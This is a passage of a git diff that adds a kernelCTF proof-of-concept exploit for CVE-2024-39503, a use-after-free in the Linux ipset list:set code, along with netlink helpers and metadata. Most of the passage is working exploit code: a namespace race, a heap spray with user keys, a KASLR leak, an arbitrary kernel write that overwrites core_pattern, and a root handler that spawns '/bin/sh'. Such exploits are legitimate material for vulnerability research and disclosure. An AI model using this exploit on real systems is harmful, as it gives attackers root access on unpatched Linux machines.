msg_setup(msg, IPSET_CMD_ADD); + + netlink_attr_put(msg, IPSET_ATTR_SETNAME, name, strlen(name) + 1); + const u8 proto = IPSET_PROTOCOL; + netlink_attr_put(msg, IPSET_ATTR_PROTOCOL, &proto, sizeof(proto)); + + struct nlattr* sd = netlink_nest_begin(msg, IPSET_ATTR_DATA); + + port = 
htons(port); + netlink_attr_append(sd, IPSET_ATTR_PORT | NLA_F_NET_BYTEORDER, &port, sizeof(port)); + + counter0 = htobe64(counter0); + netlink_attr_append(sd, IPSET_ATTR_BYTES | NLA_F_NET_BYTEORDER, &counter0, sizeof(counter0)); + counter1 = htobe64(counter1); + netlink_attr_append(sd, IPSET_ATTR_PACKETS | NLA_F_NET_BYTEORDER, &counter1, sizeof(counter1)); + + netlink_nest_end(msg, sd); +} + +static void ip_set_del_bitmap_port_elem(struct nlmsghdr* msg, const char* name, u16 port) { + msg_setup(msg, IPSET_CMD_DEL); + + netlink_attr_put(msg, IPSET_ATTR_SETNAME, name, strlen(name) + 1); + const u8 proto = IPSET_PROTOCOL; + netlink_attr_put(msg, IPSET_ATTR_PROTOCOL, &proto, sizeof(proto)); + + struct nlattr* sd = netlink_nest_begin(msg, IPSET_ATTR_DATA); + + port = htons(port); + netlink_attr_append(sd, IPSET_ATTR_PORT | NLA_F_NET_BYTEORDER, &port, sizeof(port)); + + netlink_nest_end(msg, sd); +} + +static int send_check(int fd, struct nlmsghdr* msg, u32 total_len) { + if (total_len > BUF_SIZE) { + printf("message too large: %u\n", total_len); + abort(); + } + + FAIL_IF(__netlink_send(fd, msg, total_len) < 0); + FAIL_IF(netlink_recv(fd, msg, BUF_SIZE) < 0); + return netlink_errno(msg); +} + +u64 get_jiffies() { + return times(NULL) * 10; +} + +typedef int key_serial_t; + +inline static key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) { + return syscall(__NR_add_key, type, description, payload, plen, ringid); +} + +long keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) { + return syscall(__NR_keyctl, option, arg2, arg3, arg4, arg5); +} + +void synchronize_rcu() { + // A synchronize_rcu primitive in userspace: Original idea from https://github.com/lrh2000/StackRot + if (syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1) < 0) { + perror("membarrier()"); + } +} + +#define NS_PER_JIFFIE 1000000ull + +EVENT_DEFINE(trigger_bug, __EVENT_UNSET); +int try_trigger_bug(void*); + +int spray_fake_set(void* arg) { + status_spray = SPRAY_ERROR; + int notify_fd = *(int*)arg; + + int bug_worker_pid = clone(try_trigger_bug, try_trigger_bug_stack, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM | SIGCHLD, NULL); + FAIL_IF(bug_worker_pid < 0); + + // bug triggering is now happening concurrently. We use the time to prepare our heap spray + + FAIL_IF(unshare(CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWNS) < 0); + + union key_payload payload = {}; + const size_t payload_size = sizeof(payload.ip_set) - sizeof(payload.key.header); + union key_payload readout = {}; + key_serial_t keys[256] = {}; + + struct itimerspec it = {}; + int tfd; + + FAIL_IF((tfd = timerfd_create(CLOCK_MONOTONIC, 0)) < 0); + + memset(&payload, '?', sizeof(payload)); + + // we only need to set the comment extension + #define IPSET_EXT_COMMENT 4 + payload.ip_set.extensions = IPSET_EXT_COMMENT; + + #define IPSET_EXT_ID_COMMENT 3 + // point it to the set* member (i.e. 
point back to the object we sprayed) + payload.ip_set.offset[IPSET_EXT_ID_COMMENT] = 32; + + EVENT_SET(trigger_bug); + + _pin_to_cpu(MAIN_CPU); + + // Now wait for the child to exit, signaling that ns exit is triggered and we can start the spray + FAIL_IF(waitpid(bug_worker_pid, NULL, 0) < 0); + + struct timespec t0; + clock_gettime(CLOCK_MONOTONIC, &t0); + + // now that the child exited, wait for a short grace period until the ns cleanup runs + u64 tmp; + it.it_value.tv_sec = 0; + it.it_value.tv_nsec = 50 * NS_PER_JIFFIE; + FAIL_IF(timerfd_settime(tfd, 0, &it, NULL) < 0); + + read(tfd, &tmp, sizeof(tmp)); + + struct timespec t1; + clock_gettime(CLOCK_MONOTONIC, &t1); + + u64 begin = get_jiffies(); + + // now we spray our sets. hopefully the stars align and we a) hit the race + // and b) reclaim the set with a newly prepared one + + do { + // quota: 20'000 + // sizeof(ip_set) = 152 + // 20'000 / 152 = 131 + + // one round of spraying, racing the exit handler + for (int i = 0; i < 128; i++) { + // adding a brief delay here seemed to improve race timings + u64 _t0 = __rdtsc(); + while((__rdtsc() - _t0) < 1000) {} + + if (keys[i]) { + FAIL_IF(keyctl(KEYCTL_UPDATE, keys[i], (unsigned long)&payload.key.data, payload_size, 0) < 0) + } else { + char desc[16] = {}; + snprintf(desc, sizeof(desc) - 1, "-%d", i); + + key_serial_t id = add_key("user", desc, &payload.key.data, payload_size, KEY_SPEC_PROCESS_KEYRING); + FAIL_IF(id < 0); + + keys[i] = id; + } + } + + synchronize_rcu(); + + // check for success + for (int i = 0; i < 128; i++) { + FAIL_IF(keyctl(KEYCTL_READ, keys[i], (unsigned long)&readout.key.data, payload_size, 0) < 0); + + // our payload was all '?' initially + if (readout.ip_set.ext_size != 0x3f3f3f3f3f3f3f3f) { + printf("race success: key = %d!\n", keys[i]); + + // now we have a somewhat stable UaF on the key + key_serial_t k = keys[i]; + + int nfd; + FAIL_IF((nfd = netlink_open(NETLINK_NETFILTER)) < 0); + + // wait for free of k + synchronize_rcu(); + + struct nlmsghdr* msg; + u32 total_len; + + int name_idx = 0; + char list_set_name[12 + 4 + 1] = { + '\1', '\1', // the name overlaps with the key.datalen member. 
Choose some low value > 0 + 'P','P','P','P','P','P', // 6 bytes padding + '$','$','$','$' // a unique name to monitor success + }; + + while (1) { + // we now reclaim the key with another set object + total_len = 0; + msg = (void*)scratch_buf_spray_fake_set; + bzero(scratch_buf_spray_fake_set, BUF_SIZE); + + for (int j = 0; j < 16; j++) { + snprintf(&list_set_name[12], 4 + 1, "%04x", name_idx++); + // we want counters to be able to prepare a fake bitmap_port structure + // we need a range of sizeof(struct bitmap_port) / sizeof(counters) = 5 ports + // BUT we actually only touch the first 16 bytes so one port is enough + // if we run into problems we should increase the range to be sufficiently large to + // not flood the kmalloc-192 cache where our set is in + ip_set_add_bitmap_port(msg, list_set_name, 9000, 9000/* + 15*/, IPSET_FLAG_WITH_COUNTERS); + total_len += msg->nlmsg_len; + msg = nlmsg_end(msg); + } + + FAIL_IF(send_check(nfd, (void*)scratch_buf_spray_fake_set, total_len) != 0); + + FAIL_IF(keyctl(KEYCTL_READ, k, (unsigned long)&readout.key.data, 0x0101, 0) < 0); + + if (!strncmp("$$$$", &readout.ip_set.name[8], 4)) { + printf("successfully reclaimed key with set object (sprayed %d sets)!\n", name_idx); + printf(" leaked bitmap_port_type: %p\n", readout.ip_set.type); + printf(" leaked data: %p\n", readout.ip_set.data); + break; + } + + if (name_idx >= 0xFFFF) { + printf("failed to reclaim object!\n"); + abort(); + } + } + + // apply KASLR leak + u64 diff = (u64)readout.ip_set.type - bitmap_port_type; + #define __x(name) { name += diff; } + FOR_ALL_OFFSETS(__x); + #undef __x + + // now we prepare the set to have our desired elements + // the elements will fake another struct bitmap_port, so that we can directly + // hijack the map->elements pointer to perform arbitrary kernel memory writes + // We will use it to overwrite the core_pattern + + total_len = 0; + msg = (void*)scratch_buf_spray_fake_set; + bzero(scratch_buf_spray_fake_set, BUF_SIZE); + + strcpy(&list_set_name[8], &readout.ip_set.name[8]); + printf("target set: %s\n", list_set_name); + + const struct bitmap_port fake = { + .members = (void*)core_pattern, + .first_port = 0, + .last_port = sizeof(target_core_pattern) * 8, + .elements = 0 + }; + + // we only need the first members, so one element is enough + const u64* counters = (void*)&fake; + ip_set_add_bitmap_port_elem(msg, list_set_name, 9000, counters[0], counters[1]); + total_len += msg->nlmsg_len; + msg = nlmsg_end(msg); + + FAIL_IF(send_check(nfd, (void*)scratch_buf_spray_fake_set, total_len) != 0); + + // setup complete, free the set again. + FAIL_IF(keyctl(KEYCTL_REVOKE, k, 0, 0, 0) < 0); + + synchronize_rcu(); + + memcpy(&payload, &readout, sizeof(readout)); + // the name of the set will be the size of the payload after the key payload + // reclaimed the set object + strcpy(payload.ip_set.name, (void*)&payload_size); + + // we prepped data in such a way that we can "shift" it a little bit into + // our fake bitmap structure + payload.ip_set.data = payload.ip_set.data + sizeof(struct bitmap_port); + + // reclaim the set with another key + while (1) { + + for (int j = 0; j < 128; j++) { + if (j == i) { + continue; + } + + if (keys[j]) { + if (keyctl(KEYCTL_UPDATE, keys[j], (unsigned long)&payload.key.data, payload_size, 0) < 0) { + // for some reason this may fail sporadically. 
I presume we accidently corrupt some + // key managment structures in that case + perror("keyctl()"); + keys[j] = 0; + } + } + } + + int failure = 0; + for (int byte = 0; byte < sizeof(target_core_pattern) && !failure; byte++) { + for (int bit = 0; bit < 8; bit++) { + total_len = 0; + msg = (void*)scratch_buf_spray_fake_set; + bzero(scratch_buf_spray_fake_set, BUF_SIZE); + + if ((target_core_pattern[byte] >> bit) & 1) { + // we can avoid overwriting the counters by setting them to -1 + // this way, we do not accidently corrupt any data oob of our fake bitmap type + ip_set_add_bitmap_port_elem(msg, (void*)&payload_size, byte * 8 + bit, ~0, ~0); + } else { + ip_set_del_bitmap_port_elem(msg, (void*)&payload_size, byte * 8 + bit); + } + msg->nlmsg_flags |= NLM_F_ACK; + total_len += msg->nlmsg_len; + msg = nlmsg_end(msg); + + int err = send_check(nfd, (void*)scratch_buf_spray_fake_set, total_len); + if (err == -ENOENT) { + failure = 1; + break; + } + + if (err < 0 && err != -IPSET_ERR_EXIST) { + perror("bitmap add/del elem"); + return -1; + } + } + } + + if (!failure) { + // success. if we made it this far we can likely trigger root.. + printf("spray succeeded!\n"); + FAIL_IF(write(notify_fd, "x", 1) < 0); + + while (1) { + sleep(1000); + } + } + + usleep(500); + } + } + } + // no need to try for too long, the window is small + } while (get_jiffies() - begin < 400); + + // display some stats. only useful for debugging + struct timespec t2; + clock_gettime(CLOCK_MONOTONIC, &t2); + + printf("child signal : %lu.%lu\n", t0.tv_sec, t0.tv_nsec); + printf("start spraying: %lu.%lu\n", t1.tv_sec, t1.tv_nsec); + printf("stop spraying : %lu.%lu\n", t2.tv_sec, t2.tv_nsec); + + status_spray = SPRAY_RETRY; + return 0; +} + + +int try_trigger_bug(void* arg) { + EVENT_WAIT(trigger_bug); + + // we want to allocate sets on a known CPU. + _pin_to_cpu(MAIN_CPU); + + int nfd; + FAIL_IF((nfd = netlink_open(NETLINK_NETFILTER)) < 0); + int tfd; + FAIL_IF((tfd = timerfd_create(CLOCK_MONOTONIC, 0)) < 0); + + struct itimerspec it = {}; + + u32 total_len = 0; + struct nlmsghdr* msg = (void*)scratch_buf_try_trigger_bug; + + bzero(scratch_buf_try_trigger_bug, BUF_SIZE); + total_len = 0; + msg = (void*)scratch_buf_try_trigger_bug; + + char list_set_name[3] = {'!', 'A', '\0'}; + + for (int j = 0; j < 10; j++) { + list_set_name[1] = 'A' + j; + ip_set_add_list_set(msg, list_set_name, 1, 0); + total_len += msg->nlmsg_len; + msg = nlmsg_end(msg); + } + + // we need to add only one elem per set here. Problem is that multiple elements in a set + // may easily cause double-frees which are detected by free list hardening + for (int i = 0; i < 1; i++) { + char name[3] = {0}; + snprintf(name, sizeof(name), "%x", i); + + ip_set_add_bitmap_port(msg, name, 9999, 9999, 0); + total_len += msg->nlmsg_len; + msg = nlmsg_end(msg); + + for (int j = 0; j < 10; j++) { + list_set_name[1] = 'A' + j; + ip_set_add_list_set_elem(msg, list_set_name, name, 1); + total_len += msg->nlmsg_len; + msg = nlmsg_end(msg); + } + } + + // the gc timers are initialized throughout a ~ 25 jiffies window + // the timers are set to expire after 1 * 1000 jiffies + // timer expiry is ~ 50 jiffie accurate, biased towards later timeouts + // when the process exits, a grace period of ~ 15 jiffies elapses until + // the ns clean up runs (i.e. 
15 jiffies after the parent receives the signal) + // the process exit signal delivery to the parent is sub-jiffie accurate + // + // with all the noise, a little sub 1 sec seems to be the optimal expiry + // if you have trouble reproducing, this is the parameter to tune + it.it_value.tv_sec = 0; + it.it_value.tv_nsec = 960 * NS_PER_JIFFIE; + + FAIL_IF(timerfd_settime(tfd, 0, &it, NULL) < 0); + + if (send_check(nfd, (void*)scratch_buf_try_trigger_bug, total_len) != 0) { + perror("netlink_send()"); + return -1; + } + + _pin_to_cpu(HELPER_CPU); + + close(nfd); + + u64 tmp; + read(tfd, &tmp, sizeof(tmp)); + + exit(0); +} + +int main(int argc, char *argv[]) { + // check if we are root + if (!getuid()) { + // we provided the pid of the faulting process as argument + pid_t pid = strtoul(argv[1], NULL, 10); + + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd,0); + dup2(stdoutfd,1); + dup2(stderrfd,2); + + char* shell[] = { + "/bin/sh", + "-c", + "/bin/cat /flag && /bin/sh", + NULL, + }; + execve(shell[0], shell, NULL); + return 0; + } + + printf("Hello World!\n"); + + // setup a worker which will trigger the core_pattern + // we do this before anything else because any namespace exit after the bug + // trigger will likely panic the kernel + int pipefds[2] = {}; + FAIL_IF(pipe(pipefds)) + int fault_worker; + FAIL_IF((fault_worker = fork()) < 0); + if (!fault_worker) { + close(pipefds[1]); + + // blocks until the spray worker will signal success + char buf[1]; + FAIL_IF(read(pipefds[0], buf, 1) < 0); + + // trigger segfault + asm volatile ("xor %rax, %rax; movq $0, (%rax);"); + + return 0; + } + + close(pipefds[0]); + + FAIL_IF((scratch_buf_spray_fake_set = calloc(BUF_SIZE, 1)) == NULL); + FAIL_IF((scratch_buf_try_trigger_bug = calloc(BUF_SIZE, 1)) == NULL); + + try_trigger_bug_stack = mmap(NULL, 0x8000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(try_trigger_bug_stack == MAP_FAILED); + try_trigger_bug_stack += 0x8000; + spray_fake_set_stack = mmap(NULL, 0x8000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(spray_fake_set_stack == MAP_FAILED); + spray_fake_set_stack += 0x8000; + + // try hitting the race + do { + int spray_worker_pid = clone(spray_fake_set, spray_fake_set_stack, CLONE_VM | SIGCHLD, &pipefds[1]); + FAIL_IF(spray_worker_pid < 0); + + FAIL_IF(waitpid(spray_worker_pid, NULL, 0) < 0); + + } while (status_spray == SPRAY_RETRY); + + if (status_spray == SPRAY_ERROR) { + return -1; + } + return 0; +} diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/netlink.c b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/netlink.c new file mode 100644 index 00000000..5d707f63 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/netlink.c @@ -0,0 +1,153 @@ +#include "netlink.h" + +#include +#include +#include +#include +#include +#include + + +u16 netlink_attr_put(struct nlmsghdr* nlh, u16 nla_type, const void* data, u16 data_len) { + nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len); + struct nlattr* attr = (void*)(nlh) + nlh->nlmsg_len; + + attr->nla_type = nla_type; + attr->nla_len = NLA_HDRLEN + data_len; + memcpy((char*)attr + NLA_HDRLEN, data, data_len); + + nlh->nlmsg_len += attr->nla_len; + return attr->nla_len; +} + +u16 netlink_attr_append(struct nlattr* attr, u16 nla_type, const void* data, u16 data_len) { + 
attr->nla_len = NLMSG_ALIGN(attr->nla_len); + struct nlattr* a = (void*)(attr) + attr->nla_len; + + a->nla_type = nla_type; + a->nla_len = NLA_HDRLEN + data_len; + memcpy((char*)a + NLA_HDRLEN, data, data_len); + + attr->nla_len += a->nla_len; + return a->nla_len; +} + +struct nlattr* netlink_nest_begin(struct nlmsghdr* nlh, u16 nla_type) { + nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len); + struct nlattr* attr = (void*)(nlh) + nlh->nlmsg_len; + + attr->nla_type = nla_type | NLA_F_NESTED; + attr->nla_len = NLA_HDRLEN; + + return attr; +} +u16 netlink_nest_end(struct nlmsghdr* nlh, struct nlattr* attr) { + nlh->nlmsg_len += attr->nla_len; + return attr->nla_len; +} + +struct nlattr* netlink_attr_nest_begin(struct nlattr* attr, u16 nla_type) { + attr->nla_len = NLMSG_ALIGN(attr->nla_len); + struct nlattr* child = (void*)attr + attr->nla_len; + + child->nla_type = nla_type | NLA_F_NESTED; + child->nla_len = NLA_HDRLEN; + + return child; +} +u16 netlink_attr_nest_end(struct nlattr* parent, struct nlattr* inner) { + parent->nla_len += inner->nla_len; + return inner->nla_len; +} + + +int __netlink_send(int fd, const void* nlh, size_t size) { + struct iovec iov = { + .iov_base = (void*)nlh, + .iov_len = size, + }; + struct msghdr msg = { + .msg_name = NULL, + .msg_namelen = 0, + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = NULL, + .msg_controllen = 0, + .msg_flags = 0, + }; + + if (sendmsg(fd, &msg, 0) < 0) { + perror("sendmsg()"); + return -1; + } + + return 0; +} + +int netlink_recv(int fd, void* nlh, size_t size) { + struct iovec iov = { + .iov_base = (void*)nlh, + .iov_len = 0, + }; + struct msghdr msg = { + .msg_name = NULL, + .msg_namelen = 0, + .msg_iov = NULL, + .msg_iovlen = 0, + .msg_control = NULL, + .msg_controllen = 0, + .msg_flags = MSG_TRUNC, + }; + + memset(nlh, 0, size); + iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC | MSG_DONTWAIT); + if ((ssize_t)iov.iov_len < 0) { + if (errno == EAGAIN) { + return 0; + } + + perror("recvmsg()"); + return -1; + } + if (iov.iov_len > size) { + fprintf(stderr, "message too large: %zu > %zu\n", iov.iov_len, size); + return -1; + } + + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + return recvmsg(fd, &msg, 0); +} + +int netlink_errno(const struct nlmsghdr* nlh) { + if (nlh->nlmsg_len == 0) { + return 0; + } + if (nlh->nlmsg_type != NLMSG_ERROR) { + fprintf(stderr, "warning: not a netlink error message: %hu\n", nlh->nlmsg_type); + return 0; + } + struct nlmsgerr* e = NLMSG_DATA(nlh); + if (e->error != 0) { + errno = -e->error; + } + + return e->error; +} + +int netlink_open(int proto) { + struct sockaddr_nl addr = {0}; + addr.nl_family = AF_NETLINK; + + int s = socket(AF_NETLINK, SOCK_RAW, proto); + if (s < 0) { + perror("socket()"); + return s; + } + if (bind(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) { + perror("bind()"); + return -1; + } + + return s; +} diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/netlink.h b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/netlink.h new file mode 100644 index 00000000..f88e8f58 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/netlink.h @@ -0,0 +1,41 @@ +#ifndef __H_NETLINK +#define __H_NETLINK + +#include +#include + +#include + +typedef uint16_t u16; + +static inline void* nlmsg_end(struct nlmsghdr* nlh) { + return (char*)(nlh) + NLMSG_ALIGN(nlh->nlmsg_len); +} + +static inline void* nlattr_end(struct nlattr* attr) { + return (char*)(attr) + NLMSG_ALIGN(attr->nla_len); +} + +int netlink_open(int proto); + +int 
netlink_recv(int fd, void* nlh, size_t size); + +int __netlink_send(int fd, const void* nlh, size_t size); +static inline int netlink_send(int fd, const struct nlmsghdr* nlh) { + return __netlink_send(fd, nlh, nlh->nlmsg_len); +} + +int netlink_errno(const struct nlmsghdr* nlh); + +u16 netlink_attr_put(struct nlmsghdr* nlh, u16 nla_type, const void* data, u16 data_len); + +struct nlattr* netlink_nest_begin(struct nlmsghdr* nlh, u16 nla_type); +u16 netlink_nest_end(struct nlmsghdr* nlh, struct nlattr* attr); + +struct nlattr* netlink_attr_nest_begin(struct nlattr* attr, u16 nla_type); +u16 netlink_attr_nest_end(struct nlattr* parent, struct nlattr* inner); + +u16 netlink_attr_append(struct nlattr* attr, u16 nla_type, const void* data, u16 data_len); + + +#endif /* __H_NETLINK */ diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/metadata.json b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/metadata.json new file mode 100644 index 00000000..04927821 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/metadata.json @@ -0,0 +1,32 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp169", "exp172"], + "vulnerability": { + "cve": "CVE-2024-39503", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4e7aaa6b82d63e8ddcbfb56b4fd3d014ca586f10", + "affected_versions": ["6.8-rc3 - 6.10-rc4"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NETFILTER", + "CONFIG_IP_SET", + "CONFIG_IP_SET_LIST_SET" + ] + } + }, + "exploits": { + "lts-6.6.30": { + "environment": "lts-6.6.30", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "70%" + }, + "cos-109-17800.218.20": { + "environment": "cos-109-17800.218.20", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "70% success rate" + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/original_exp169.tar.gz b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/original_exp169.tar.gz new file mode 100644 index 00000000..b6f5fb9b Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/original_exp169.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/original_exp172.tar.gz b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/original_exp172.tar.gz new file mode 100644 index 00000000..5ae12ac5 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/original_exp172.tar.gz differ